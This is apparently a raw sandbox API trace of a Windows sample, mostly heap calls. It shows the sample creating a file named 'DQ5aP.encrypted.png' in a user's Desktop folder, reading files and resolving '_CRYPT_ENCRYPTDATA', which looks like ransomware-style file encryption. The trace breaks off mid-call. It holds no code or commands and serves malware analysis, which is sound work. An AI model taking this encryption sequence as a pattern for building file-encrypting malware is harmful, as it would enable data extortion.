RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.842] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf")) returned 0x10 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\dq5ap.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0030.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.845] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.845] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x3153, lpOverlapped=0x0) returned 1 [0030.846] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3153) returned 0x7c7968 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3153) returned 0x946010 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.846] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3153) returned 0x7c7968 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.847] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.847] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.847] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3153) returned 0x7c7968 [0030.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3153) returned 0x949170 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.849] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.849] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.849] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.850] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.850] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.851] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.851] RtlAllocateHeap 